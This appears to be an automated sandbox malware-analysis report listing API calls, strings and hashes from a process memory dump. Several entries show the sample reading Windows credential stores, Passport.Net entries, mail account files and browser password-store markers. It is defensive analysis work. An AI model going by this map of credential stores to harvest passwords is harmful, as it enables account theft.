                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                              APIs
                                                              • memset.MSVCRT ref: 004076D7
                                                              • sprintf.MSVCRT ref: 00407704
                                                              • strlen.MSVCRT ref: 00407710
                                                              • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                              • strlen.MSVCRT ref: 00407733
                                                              • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$memsetsprintf
                                                              • String ID: %s (%s)
                                                              • API String ID: 3756086014-1363028141
                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                              APIs
                                                              • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                              • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                              • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                              Strings
                                                              • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                              • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FromStringUuid$FreeTaskmemcpy
                                                              • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                              • API String ID: 1640410171-3316789007
                                                              • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                              • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                              • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                              • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              APIs
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 82305771-620537770
                                                              • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              APIs
                                                              • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                              Strings
                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                              • no such savepoint: %s, xrefs: 00426A02
                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                              • unknown error, xrefs: 004277B2
                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                              • API String ID: 3510742995-3035234601
                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              APIs
                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                              • strlen.MSVCRT ref: 0040F7BE
                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                              • String ID: Passport.Net\*
                                                              • API String ID: 2329438634-3671122194
                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: H
                                                              • API String ID: 2221118986-2852464175
                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                              • API String ID: 3510742995-3170954634
                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: winWrite1$winWrite2
                                                              • API String ID: 438689982-3457389245
                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
